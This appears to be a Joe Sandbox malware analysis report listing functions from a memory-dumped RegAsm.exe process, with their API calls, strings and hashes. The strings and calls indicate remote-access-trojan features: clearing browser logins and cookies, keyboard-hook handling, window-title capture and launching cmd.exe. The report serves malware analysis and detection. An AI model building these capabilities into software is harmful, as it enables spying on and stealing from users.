                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                • String ID: !D@
                                                • API String ID: 186401046-604454484
                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: /C $cmd.exe$open
                                                • API String ID: 587946157-3896048727
                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: TerminateThread$HookUnhookWindows
                                                • String ID: pth_unenc
                                                • API String ID: 3123878439-4028850238
                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll
                                                • API String ID: 1646373207-2714051624
                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                • __freea.LIBCMT ref: 100087D5
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                • API String ID: 3472027048-1236744412
                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DisplayEnum$Devices$Monitors
                                                • String ID:
                                                • API String ID: 1432082543-0
                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$CloseHandleReadSize
                                                • String ID:
                                                • API String ID: 3642004256-0
                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$ForegroundLength
                                                • String ID: [ $ ]
                                                • API String ID: 3309952895-93608704
                                                • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SystemTimes$Sleep__aulldiv
                                                • String ID:
                                                • API String ID: 188215759-0
                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcess
                                                • String ID:
                                                • API String ID: 39102293-0
                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                • String ID:
                                                • API String ID: 2633735394-0
                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MetricsSystem
                                                • String ID:
                                                • API String ID: 4116985748-0
                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                • String ID:
                                                • API String ID: 1761009282-0
                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
